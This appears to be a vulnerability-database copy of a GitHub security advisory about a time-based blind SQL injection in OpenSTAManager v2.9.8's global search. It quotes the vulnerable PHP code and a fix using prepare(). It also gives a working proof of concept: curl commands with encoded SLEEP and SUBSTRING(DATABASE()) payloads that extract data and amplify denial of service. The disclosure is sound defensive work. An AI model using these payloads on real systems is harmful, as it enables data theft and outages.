GHSA-4HC4-8599-XH2H

Vulnerability from github – Published: 2026-02-06 18:23 – Updated: 2026-02-06 18:23
VLAI?
Summary
OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service
Details

Summary

Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with amplified execution across 10+ modules.

Status: ✅ Confirmed and tested on live instance (v2.9.8) Vulnerable Parameter: term (GET) Affected Endpoint: /ajax_search.php Affected Modules: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi

Details

OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.

Vulnerability Chain:

  1. Entry Point: /ajax_search.php (Line 30-31) php $term = get('term'); $term = str_replace('/', '\\/', $term); The $term parameter undergoes minimal sanitization (only forward slash replacement).

  2. Distribution: /src/AJAX.php::search() (Line 159-161) php $files = self::find('ajax/search.php'); array_unshift($files, base_dir().'/ajax_search.php'); foreach ($files as $file) { $module_results = self::getSearchResults($file, $term); The unsanitized $term is passed to all module-specific search handlers.

  3. Execution: /src/AJAX.php::getSearchResults() (Line 373) php require $file; Each module's search.php file is included with $term variable in scope.

  4. Vulnerable SQL Queries: Multiple modules directly concatenate $term without prepare()

All Affected Files (10+ vulnerable instances):

  1. /modules/articoli/ajax/search.php - Line 51 (PRIMARY EXAMPLE) php foreach ($fields as $name => $value) { $query .= ' OR '.$value.' LIKE "%'.$term.'%"'; } $rs = $dbo->fetchArray($query); Impact: Direct concatenation without prepare(), allows full SQL injection.

  2. /modules/ordini/ajax/search.php - Line 43, 47 php $query .= ' OR '.$value.' LIKE "%'.$term.'%"'; $query .= '... WHERE `mg_articoli`.`codice` LIKE "%'.$term.'%" OR `mg_articoli_lang`.`title` LIKE "%'.$term.'%"';

  3. /modules/ddt/ajax/search.php - Line 43, 47 php $query .= ' OR '.$value.' LIKE "%'.$term.'%"';

  4. /modules/fatture/ajax/search.php - Line 45, 49 php $query .= ' OR '.$value.' LIKE "%'.$term.'%"';

  5. /modules/preventivi/ajax/search.php - Line 45, 49 php $query .= ' OR '.$value.' LIKE "%'.$term.'%"';

  6. /modules/anagrafiche/ajax/search.php - Line 62, 107, 162 php $query .= ' OR '.$value.' LIKE "%'.$term.'%"';

  7. /modules/impianti/ajax/search.php - Line 46 php $query .= ' OR '.$value.' LIKE "%'.$term.'%"';

Properly Sanitized (NOT vulnerable): - /modules/contratti/ajax/search.php - Uses prepare() correctly - /modules/automezzi/ajax/search.php - Uses prepare() correctly

Note: The vulnerability has amplified execution - a single malicious request triggers SQL Injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to 504 Gateway Time-out errors as observed on the live demo instance.

image

PoC

Step 1: Login

curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Step 2: Verify Vulnerability (Time-Based SLEEP)

# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
# Result: real 72.29s

# Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
# Result: real 0.30s

image

Step 3: Data Extraction - Database Name

# Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 170.32s

# Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 0m0.30s

image

Impact

Affected Users: All authenticated users with access to the global search functionality.

  • Complete database exfiltration including customer PII, financial records, business secrets
  • Extraction of password hashes for offline cracking
  • Amplified time-based attacks consume 85x server resources per request

Recommended Fix:

Replace all instances of direct $term concatenation with prepare():

BEFORE (Vulnerable):

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';

AFTER (Fixed):

$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');

Apply this fix to ALL affected files: 1. /modules/articoli/ajax/search.php - Line 51 2. /modules/ordini/ajax/search.php - Lines 43, 47, 79 3. /modules/ddt/ajax/search.php - Lines 43, 47, 83 4. /modules/fatture/ajax/search.php - Lines 45, 49, 85 5. /modules/preventivi/ajax/search.php - Lines 45, 49, 83 6. /modules/anagrafiche/ajax/search.php - Lines 62, 107, 162 7. /modules/impianti/ajax/search.php - Line 46

Severity ?
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 2.9.8"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "devcode-it/openstamanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24417"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-06T18:23:14Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nCritical Time-Based Blind SQL Injection vulnerability affecting **multiple search modules** in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with **amplified execution** across 10+ modules.\n\n**Status:** \u2705 Confirmed and tested on live instance (v2.9.8)\n**Vulnerable Parameter:** `term` (GET)\n**Affected Endpoint:** `/ajax_search.php`\n**Affected Modules:** Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi\n\n### Details\n\nOpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the `term` parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.\n\n**Vulnerability Chain:**\n\n1. **Entry Point:** `/ajax_search.php` (Line 30-31)\n   ```php\n   $term = get(\u0027term\u0027);\n   $term = str_replace(\u0027/\u0027, \u0027\\\\/\u0027, $term);\n   ```\n   The `$term` parameter undergoes minimal sanitization (only forward slash replacement).\n\n2. **Distribution:** `/src/AJAX.php::search()` (Line 159-161)\n   ```php\n   $files = self::find(\u0027ajax/search.php\u0027);\n   array_unshift($files, base_dir().\u0027/ajax_search.php\u0027);\n   foreach ($files as $file) {\n       $module_results = self::getSearchResults($file, $term);\n   ```\n   The unsanitized `$term` is passed to all module-specific search handlers.\n\n3. **Execution:** `/src/AJAX.php::getSearchResults()` (Line 373)\n   ```php\n   require $file;\n   ```\n   Each module\u0027s search.php file is included with `$term` variable in scope.\n\n4. **Vulnerable SQL Queries:** Multiple modules directly concatenate `$term` without `prepare()`\n\n**All Affected Files (10+ vulnerable instances):**\n\n1. **`/modules/articoli/ajax/search.php` - Line 51** (PRIMARY EXAMPLE)\n   ```php\n   foreach ($fields as $name =\u003e $value) {\n       $query .= \u0027 OR \u0027.$value.\u0027 LIKE \"%\u0027.$term.\u0027%\"\u0027;\n   }\n   $rs = $dbo-\u003efetchArray($query);\n   ```\n   **Impact:** Direct concatenation without `prepare()`, allows full SQL injection.\n\n2. **`/modules/ordini/ajax/search.php` - Line 43, 47**\n   ```php\n   $query .= \u0027 OR \u0027.$value.\u0027 LIKE \"%\u0027.$term.\u0027%\"\u0027;\n   $query .= \u0027... WHERE `mg_articoli`.`codice` LIKE \"%\u0027.$term.\u0027%\" OR `mg_articoli_lang`.`title` LIKE \"%\u0027.$term.\u0027%\"\u0027;\n   ```\n\n3. **`/modules/ddt/ajax/search.php` - Line 43, 47**\n   ```php\n   $query .= \u0027 OR \u0027.$value.\u0027 LIKE \"%\u0027.$term.\u0027%\"\u0027;\n   ```\n\n4. **`/modules/fatture/ajax/search.php` - Line 45, 49**\n   ```php\n   $query .= \u0027 OR \u0027.$value.\u0027 LIKE \"%\u0027.$term.\u0027%\"\u0027;\n   ```\n\n5. **`/modules/preventivi/ajax/search.php` - Line 45, 49**\n   ```php\n   $query .= \u0027 OR \u0027.$value.\u0027 LIKE \"%\u0027.$term.\u0027%\"\u0027;\n   ```\n\n6. **`/modules/anagrafiche/ajax/search.php` - Line 62, 107, 162**\n   ```php\n   $query .= \u0027 OR \u0027.$value.\u0027 LIKE \"%\u0027.$term.\u0027%\"\u0027;\n   ```\n\n7. **`/modules/impianti/ajax/search.php` - Line 46**\n   ```php\n   $query .= \u0027 OR \u0027.$value.\u0027 LIKE \"%\u0027.$term.\u0027%\"\u0027;\n   ```\n\n**Properly Sanitized (NOT vulnerable):**\n- `/modules/contratti/ajax/search.php` - Uses `prepare()` correctly\n- `/modules/automezzi/ajax/search.php` - Uses `prepare()` correctly\n\n**Note:** The vulnerability has **amplified execution** - a single malicious request triggers SQL Injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to **504 Gateway Time-out** errors as observed on the live demo instance.\n\n\u003cimg width=\"1899\" height=\"349\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a6cc5a75-0f4e-4f49-a750-7ae72a363bbe\" /\u003e\n\n### PoC\n\n**Step 1: Login**\n```bash\ncurl -c /tmp/cookies.txt -X POST \u0027http://localhost:8081/index.php?op=login\u0027 \\\n  -d \u0027username=admin\u0026password=admin\u0027\n```\n\n**Step 2: Verify Vulnerability (Time-Based SLEEP)**\n```bash\n# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution\ntime curl -s -b /tmp/cookies.txt \\\n  \u0027http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22\u0027\n# Result: real 72.29s\n\n# Test with SLEEP(0) - should be fast\ntime curl -s -b /tmp/cookies.txt \\\n  \u0027http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22\u0027\n# Result: real 0.30s\n```\n\n\u003cimg width=\"727\" height=\"319\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6022de5e-de91-4ebb-b02a-30358c31d96d\" /\u003e\n\n\n**Step 3: Data Extraction - Database Name**\n```bash\n# Extract first character of database name (expected: \u0027o\u0027 from \u0027openstamanager\u0027)\ntime curl -s -b /tmp/cookies.txt \\\n  \"http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221\" \\\n  \u003e /dev/null\n# Result: real 170.32s\n\n# Test with wrong character \u0027x\u0027 - should be fast\ntime curl -s -b /tmp/cookies.txt \\\n  \"http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221\" \\\n  \u003e /dev/null\n# Result: real 0m0.30s\n```\n\n\u003cimg width=\"1364\" height=\"349\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a1d8a7d8-bb1a-49cd-8400-136ae5e359f1\" /\u003e\n\n\n### Impact\n\n**Affected Users:** All authenticated users with access to the global search functionality.\n\n- Complete database exfiltration including customer PII, financial records, business secrets\n- Extraction of password hashes for offline cracking\n- Amplified time-based attacks consume 85x server resources per request\n\n**Recommended Fix:**\n\nReplace all instances of direct `$term` concatenation with `prepare()`:\n\n**BEFORE (Vulnerable):**\n```php\n$query .= \u0027 OR \u0027.$value.\u0027 LIKE \"%\u0027.$term.\u0027%\"\u0027;\n```\n\n**AFTER (Fixed):**\n```php\n$query .= \u0027 OR \u0027.$value.\u0027 LIKE \u0027.prepare(\u0027%\u0027.$term.\u0027%\u0027);\n```\n\n**Apply this fix to ALL affected files:**\n1. `/modules/articoli/ajax/search.php` - Line 51\n2. `/modules/ordini/ajax/search.php` - Lines 43, 47, 79\n3. `/modules/ddt/ajax/search.php` - Lines 43, 47, 83\n4. `/modules/fatture/ajax/search.php` - Lines 45, 49, 85\n5. `/modules/preventivi/ajax/search.php` - Lines 45, 49, 83\n6. `/modules/anagrafiche/ajax/search.php` - Lines 62, 107, 162\n7. `/modules/impianti/ajax/search.php` - Line 46",
  "id": "GHSA-4hc4-8599-xh2h",
  "modified": "2026-02-06T18:23:14Z",
  "published": "2026-02-06T18:23:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/devcode-it/openstamanager"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.